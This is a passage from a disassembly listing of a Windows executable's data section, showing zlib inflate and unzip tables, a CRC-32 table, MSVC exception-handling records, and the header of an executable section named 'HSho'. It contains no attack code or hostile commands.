dd 800h, 42h, 900h, 0E4h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 94h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D4h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B4h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F4h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CCh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ACh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0ECh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Ch, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DCh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BCh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FCh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C2h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A2h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E2h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 92h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D2h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B2h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F2h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CAh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0AAh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EAh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Ah, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DAh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BAh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FAh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C6h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A6h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E6h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 96h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D6h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B6h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F6h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CEh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AEh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EEh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Eh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DEh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BEh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FEh, 760h, 100h, 800h
dd 50h, 800h, 10h, 854h, 73h, 752h, 1Fh, 800h, 70h, 800h
dd 30h, 900h, 0C1h, 750h, 0Ah, 800h, 60h, 800h, 20h, 900h
dd 0A1h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E1h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 91h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D1h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B1h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F1h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C9h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A9h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E9h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 99h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D9h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B9h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F9h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C5h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A5h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E5h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 95h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D5h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B5h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F5h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CDh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ADh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0EDh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Dh, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DDh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BDh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FDh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C3h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A3h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E3h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 93h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D3h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B3h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F3h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CBh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0ABh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EBh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Bh, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DBh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BBh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FBh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C7h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A7h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E7h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 97h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D7h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B7h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F7h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CFh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AFh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EFh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Fh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DFh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BFh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FFh
dword_414340 dd 550h, 1, 557h, 101h, 553h, 11h, 55Bh, 1001h, 551h, 5
; DATA XREF: sub_40CE2B+21�o
dd 559h, 401h, 555h, 41h, 55Dh, 4001h, 550h, 3, 558h, 201h
dd 554h, 21h, 55Ch, 2001h, 552h, 9, 55Ah, 801h, 556h, 81h
dd 5C0h, 6001h, 550h, 2, 557h, 181h, 553h, 19h, 55Bh, 1801h
dd 551h, 7, 559h, 601h, 555h, 61h, 55Dh, 6001h, 550h, 4
dd 558h, 301h, 554h, 31h, 55Ch, 3001h, 552h, 0Dh, 55Ah
dd 0C01h, 556h, 0C1h, 5C0h, 6001h
dword_414440 dd 10h ; sub_40AF6D+A13�r
dd 11h, 12h, 0
dd 8, 7, 9, 6, 0Ah, 5, 0Bh, 4, 0Ch, 3, 0Dh, 2, 0Eh, 1
dd 0Fh
aInflate1_1_3Co db ' inflate 1.1.3 Copyright 1995-1998 Mark Adler ',0
align 4
dword_4144BC dd 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Dh, 0Fh, 11h, 13h, 17h
; DATA XREF: sub_40CCA6+50�o
dd 1Bh, 1Fh, 23h, 2Bh, 33h, 3Bh, 43h, 53h, 63h, 73h, 83h
dd 0A3h, 0C3h, 0E3h, 102h, 2 dup(0)
dword_414538 dd 8 dup(0) dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 0
dd 2 dup(70h)
dword_4145B4 dd 1, 2, 3, 4, 5, 7, 9, 0Dh, 11h, 19h, 21h, 31h, 41h, 61h
; DATA XREF: sub_40CCA6+D9�o
dd 81h, 0C1h, 101h, 181h, 201h, 301h, 401h, 601h, 801h
dd 0C01h, 1001h, 1801h, 2001h, 3001h, 4001h, 6001h
dword_41462C dd 4 dup(0) dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh)
dword_4146A4 dd 0 ; sub_40D535+3A�r ...
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
byte_414AA4 db 20h ; DATA XREF: sub_40EA92:loc_40EAAA�r
aUnzip0_15Copyr db 'unzip 0.15 Copyright 1998 Gilles Vollant ',0
align 10h
dd offset dword_414B20
off_414AD4 dd offset sub_41159F ; DATA XREF: HSho:00417020�o
; HSho:off_417030�o ...
dword_414AD8 dd 0FFFFFFFFh, 4117C8h, 4117DCh, 414B68hoff_414AE8 dd offset sub_409A10 ; DATA XREF: sub_4099B0+26�o
; sub_409A40+A�o ...
align 10h
off_414AF0 dd offset off_417BB0 ; DATA XREF: HSho:00414B08�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_414AF0
dword_414B0C dd 3 dup(0) dd 1, 414B08h
dword_414B20 dd 3 dup(0) dd offset off_417BB0
dd offset dword_414B0C+4
align 8
off_414B38 dd offset off_417BE8 ; DATA XREF: HSho:00414B50�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_414B38
dd 0
db 0 ; DATA XREF: HSho:00414B78�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 414B50h, 3 dup(0)
dd offset off_417BE8
dd offset unk_414B58
align 10h
dword_414B80 dd 19930520h, 2, 414BA0h, 1, 414BB0h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414BC8h, 4 dup(0)
dd offset loc_40119D
dword_414BD8 dd 19930520h, 2, 414BF8h, 1, 414C08h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414C20h, 4 dup(0)
dd offset loc_401245
dword_414C30 dd 19930520h, 3, 414C50h, 1, 414C68h, 3 dup(0) dd 0FFFFFFFFh, 411A84h, 4 dup(0)
dd 2 dup(1), 2, 1, 414C80h, 4 dup(0)
dd offset loc_401402
dword_414C90 dd 19930520h, 2, 414CB0h, 1, 414CC0h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414CD8h, 4 dup(0)
dd offset loc_4015A1
dword_414CE8 dd 19930520h, 2, 414D08h, 1, 414D18h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414D30h, 4 dup(0)
dd offset loc_4017D7
dword_414D40 dd 19930520h, 2, 414D60h, 1, 414D70h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414D88h, 4 dup(0)
dd offset loc_401966
dd 1, 417020h, 0
dd 0FFFFFFFFh, 0
dd 4, 2 dup(0)
dword_414DB8 dd 1, 414D98h dword_414DC0 dd 3 dup(0) ; HSho:004012E6�o ...
dd offset dword_414DB8
dword_414DD0 dd 19930520h, 2, 414DF0h, 1, 414E00h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414E18h, 2 dup(0)
dd offset off_417030
dd 0FFFFFEC0h, 401D58h
dword_414E28 dd 19930520h, 4, 414E48h, 5 dup(0) dd 0FFFFFFFFh, 411AE5h, 0
; ---------------------------------------------------------------------------
retf 411Ah
; ---------------------------------------------------------------------------
align 4
dd 1, 411AD3h, 2, 411ADCh
dword_414E68 dd 19930520h, 0Bh, 414E88h, 5 dup(0) dd 0FFFFFFFFh, 411B08h, 0
dd offset loc_411B10
dd 1, 411B1Bh, 2, 411B26h, 3, 411B31h, 4, 411B3Ch, 5, 411B47h
dd 6, 411B52h, 7, 411B5Dh, 8, 411B6Bh, 9, 411B73h
dword_414EE0 dd 19930520h, 8, 414F00h, 5 dup(0) dd 0FFFFFFFFh, 411B88h, 0
dd offset loc_411B90
dd 1, 411B9Bh, 2, 411BA6h, 3, 411BB1h, 4, 411BBCh, 5, 411BC7h
dd 6, 411BD2h
dword_414F40 dd 19930520h, 2, 414F60h, 1, 414F70h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 414F88h, 4 dup(0)
dd offset loc_402F05
dword_414F98 dd 19930520h, 3, 414FB8h, 5 dup(0) dd 0FFFFFFFFh, 411C04h, 0
dd offset loc_411BF4
dd 1, 411BFCh
dword_414FD0 dd 19930520h, 4, 414FF0h, 5 dup(0) dd 0FFFFFFFFh, 411C40h, 0
dd offset loc_411C28
dd 1, 411C30h, 2, 411C38h
dword_415010 dd 19930520h, 20h, 415030h, 5 dup(0) dd 0FFFFFFFFh, 411C64h, 0
dd offset loc_411C6C
dd 1, 411C74h, 1, 411C7Fh, 1, 411C8Ah, 1, 411C95h, 1, 411CA0h
dd 1, 411CA8h, 1, 411CB3h, 1, 411CBBh, 1, 411CC6h, 1, 411CD1h
dd 1, 411CD9h, 1, 411CE4h, 1, 411CECh, 0Eh, 411CF4h, 0Fh
dd 411CFCh, 0Fh, 411D07h, 0Fh, 411D12h, 0Fh, 411D1Dh, 0Fh
dd 411D28h, 0Fh, 411D33h, 0Fh, 411D3Eh, 0Fh, 411D49h, 0Fh
dd 411D54h, 0Fh, 411D5Ch, 0Fh, 411D64h, 0Fh, 411D6Ch, 0Fh
dd 411D74h, 0Fh, 411D7Ch, 0Fh, 411D87h, 0Fh, 411D92h
dword_415130 dd 19930520h, 1, 415150h, 5 dup(0) dd 0FFFFFFFFh, 411DA8h
dword_415158 dd 19930520h, 1, 415178h, 5 dup(0) dd 0FFFFFFFFh, 411DBCh
dword_415180 dd 19930520h, 4, 4151A0h, 5 dup(0) dd 0FFFFFFFFh, 411DD0h, 0
dd offset loc_411DD8
dd 1, 411DE0h, 1, 411DE8h
dword_4151C0 dd 19930520h, 0Eh, 4151E0h, 5 dup(0) dd 0FFFFFFFFh, 411DFCh, 0
dd offset loc_411E04
dd 0FFFFFFFFh, 411E0Ch, 2, 411E14h, 3, 411E1Ch, 3, 411E24h
dd 3, 411E2Ch, 3, 411E34h, 7, 411E3Ch, 8, 411E44h, 7, 411E4Ch
dd 7, 411E54h, 7, 411E5Fh, 7, 411E67h
dword_415250 dd 19930520h, 2, 415270h, 5 dup(0) dd 0FFFFFFFFh, 411E7Ch, 0
dd offset loc_411E84
dword_415280 dd 19930520h, 9, 4152A0h, 5 dup(0) dd 0FFFFFFFFh, 411E98h, 0
dd offset loc_411EA0
dd 1, 411EA8h, 2, 411EB3h, 2, 411EBBh, 4, 411EC6h, 4, 411ECEh
dd 4, 411ED6h, 7, 411EE1h
dword_4152E8 dd 19930520h, 0Ah, 415308h, 5 dup(0) dd 0FFFFFFFFh, 411EF4h, 0
dd offset loc_411EFC
dd 1, 411F04h, 2, 411F0Ch, 2, 411F14h, 4, 411F1Ch, 5, 411F24h
dd 6, 411F2Ch, 6, 411F34h, 8, 411F3Ch
dword_415358 dd 19930520h, 6, 415378h, 5 dup(0) dd 0FFFFFFFFh, 411F78h, 0
dd offset loc_411F50
dd 1, 411F58h, 1, 411F60h, 3, 411F68h, 4, 411F70h
dword_4153A8 dd 19930520h, 2, 4153C8h, 5 dup(0) dd 0FFFFFFFFh, 411F9Ch, 0
dd offset loc_411FA4
dword_4153D8 dd 19930520h, 6, 4153F8h, 5 dup(0) dd 0FFFFFFFFh, 411FE0h, 0
dd offset loc_411FB8
dd 1, 411FC0h, 1, 411FC8h, 3, 411FD0h, 4, 411FD8h
dword_415428 dd 19930520h, 6, 415448h, 5 dup(0) dd 0FFFFFFFFh, 41202Ch, 0
dd offset loc_412004
dd 1, 41200Ch, 1, 412014h, 3, 41201Ch, 4, 412024h
dword_415478 dd 19930520h, 8, 415498h, 5 dup(0) dd 0FFFFFFFFh, 412050h, 0
dd offset loc_412058
dd 1, 412060h, 1, 412068h, 3, 412070h, 4, 412078h, 4, 412080h
dd 6, 412088h
dword_4154D8 dd 19930520h, 6, 4154F8h, 5 dup(0) dd 0FFFFFFFFh, 41209Ch, 0
dd offset loc_4120A4
dd 1, 4120ACh, 1, 4120B4h, 3, 4120BCh, 4, 4120C4h
dword_415528 dd 19930520h, 6, 415548h, 5 dup(0) dd 0FFFFFFFFh, 412100h, 0
dd offset loc_4120D8
dd 1, 4120E0h, 1, 4120E8h, 3, 4120F0h, 4, 4120F8h
dword_415578 dd 19930520h, 3, 415598h, 5 dup(0) dd 0FFFFFFFFh, 412124h, 0
dd offset loc_41212C
dd 1, 412134h
dword_4155B0 dd 19930520h, 15h, 4155D0h, 5 dup(0) dd 0FFFFFFFFh, 412148h, 0
dd offset loc_412150
dd 1, 412158h, 2, 412160h, 3, 412168h, 3, 412170h, 3, 412178h
dd 6, 412180h, 3, 412188h, 3, 412190h, 3, 412198h, 0Ah
dd 4121A0h, 0Bh, 4121A8h, 0Bh, 4121B0h, 0Dh, 4121B8h, 0Eh
dd 4121C0h, 0Dh, 0
dd 0Dh, 0
dd 0Dh, 4121C8h, 0Dh, 0
dd 0Dh, 0
dword_415678 dd 19930520h, 2, 415698h, 1, 4156A8h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 4156C0h, 4 dup(0)
dd offset sub_40628D
dword_4156D0 dd 19930520h, 1, 4156F0h, 5 dup(0) dd 0FFFFFFFFh, 4121F0h
dword_4156F8 dd 19930520h, 4, 415718h, 5 dup(0) dd 0FFFFFFFFh, 412203h, 0
dd offset loc_41220C
dd 1, 412215h, 1, 41221Eh
dword_415738 dd 19930520h, 3, 415758h, 5 dup(0) dd 0FFFFFFFFh, 412231h, 0
dd offset loc_41223A
dd 1, 412246h
dword_415770 dd 19930520h, 7, 415790h, 5 dup(0) dd 0FFFFFFFFh, 41225Ch, 0
dd offset loc_412265
dd 1, 41226Eh, 2, 412277h, 3, 412283h, 4, 41228Fh, 4, 412298h
dword_4157C8 dd 19930520h, 2, 4157E8h, 5 dup(0) dd 0FFFFFFFFh, 4122ABh, 0
dd offset loc_4122B4
dword_4157F8 dd 19930520h, 1, 415818h, 5 dup(0) dd 0FFFFFFFFh, 4122CAh
dword_415820 dd 19930520h, 1, 415840h, 5 dup(0) dd 0FFFFFFFFh, 4122DDh
dword_415848 dd 19930520h, 1, 415868h, 5 dup(0) dd 0FFFFFFFFh, 4122F0h
dword_415870 dd 19930520h, 4, 415890h, 5 dup(0) dd 0FFFFFFFFh, 412303h, 0
dd offset loc_41230C
dd 1, 412315h, 1, 41231Eh
dword_4158B0 dd 19930520h, 1, 4158D0h, 5 dup(0) dd 0FFFFFFFFh, 412331h
dword_4158D8 dd 19930520h, 4, 4158F8h, 5 dup(0) dd 0FFFFFFFFh, 412344h, 0
dd offset loc_41234D
dd 1, 412356h, 1, 41235Fh
dword_415918 dd 19930520h, 3, 415938h, 5 dup(0) dd 0FFFFFFFFh, 412372h, 0
dd offset loc_41237B
dd 1, 412388h
dword_415950 dd 19930520h, 7, 415970h, 5 dup(0) dd 0FFFFFFFFh, 41239Fh, 0
dd offset loc_4123A9
dd 1, 4123B3h, 2, 4123BCh, 3, 4123C9h, 4, 4123D6h, 4, 4123E0h
dword_4159A8 dd 19930520h, 2, 4159C8h, 5 dup(0) dd 0FFFFFFFFh, 4123F4h, 0
dd offset loc_4123FD
dword_4159D8 dd 19930520h, 1, 4159F8h, 5 dup(0) dd 0FFFFFFFFh, 412414h
dword_415A00 dd 19930520h, 1, 415A20h, 5 dup(0) dd 0FFFFFFFFh, 412428h
dword_415A28 dd 19930520h, 1, 415A48h, 5 dup(0) dd 0FFFFFFFFh, 41243Ch
dword_415A50 dd 19930520h, 4, 415A70h, 5 dup(0) dd 0FFFFFFFFh, 41244Fh, 0
dd offset loc_412459
dd 1, 412462h, 1, 41246Ch
dword_415A90 dd 19930520h, 1, 415AB0h, 5 dup(0) dd 0FFFFFFFFh, 412480h
dword_415AB8 dd 19930520h, 1, 415AD8h, 5 dup(0) dd 0FFFFFFFFh, 4124A0h
dword_415AE0 dd 19930520h, 1, 415B00h, 5 dup(0) dd 0FFFFFFFFh, 4124C0h
dword_415B08 dd 19930520h, 1, 415B28h, 5 dup(0) dd 0FFFFFFFFh, 4124E0h
dword_415B30 dd 19930520h, 3, 415B50h, 5 dup(0) dd 0FFFFFFFFh, 412500h, 0
dd offset loc_41250C
dd 1, 412518h
dword_415B68 dd 19930520h, 3, 415B88h, 5 dup(0) dd 0FFFFFFFFh, 412540h, 0
dd offset loc_41254C
dd 1, 412558h
dword_415BA0 dd 19930520h, 1Ah, 415BC0h, 5 dup(0) dd 0FFFFFFFFh, 412580h, 0
dd offset loc_412589
dd 1, 412592h, 2, 41259Bh, 3, 4125A4h, 4, 4125B0h, 5, 4125BCh
dd 6, 4125C8h, 7, 4125D4h, 8, 4125E0h, 9, 4125ECh, 0Ah
dd 4125F8h, 0Bh, 412604h, 0Ch, 412610h, 0Dh, 41261Ch, 0Eh
dd 412628h, 0Fh, 412634h, 10h, 412640h, 11h, 41264Ch, 12h
dd 412658h, 13h, 412664h, 3, 412670h, 3, 41267Ch, 16h
dd 412688h, 17h, 412691h, 17h, 41269Dh
dword_415C90 dd 19930520h, 8, 415CB0h, 5 dup(0) dd 0FFFFFFFFh, 4126B3h, 0
dd offset loc_4126BF
dd 0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 26h, 41h, 0
dd 0
dd offset loc_4126D7
dd 0
dd offset loc_4126E3
dd 0
dd offset loc_4126EF
dd 0
dd offset loc_4126FB
dd 0
dd offset loc_412707
dword_415CF0 dd 19930520h, 2, 415D10h, 1, 415D20h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 415D38h, 4 dup(0)
dd offset loc_4093AF
dword_415D48 dd 19930520h, 1, 415D68h, 5 dup(0) dd 0FFFFFFFFh, 412730h
dword_415D70 dd 19930520h, 1, 415D90h, 5 dup(0) dd 0FFFFFFFFh, 412750h
dword_415D98 dd 19930520h, 1, 415DB8h, 5 dup(0) dd 0FFFFFFFFh, 412770h
dword_415DC0 dd 19930520h, 1, 415DE0h, 5 dup(0) dd 0FFFFFFFFh, 412790h, 0
dd offset off_417BE8
dd 0
dd 0FFFFFFFFh, 0
dd 10h, 411A38h, 0
dword_415E08 dd 1, 415DE8h dword_415E10 dd 0 dd offset sub_409A40
dd 0
dd offset dword_415E08
align 200h
HSho ends
; Section 2. (virtual address 00016000)
; Virtual size : 00009000 ( 36864.)
; Section size in file : 00009000 ( 36864.)
; Offset to raw data for section: 00016000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
HSho segment para public 'CODE' use32
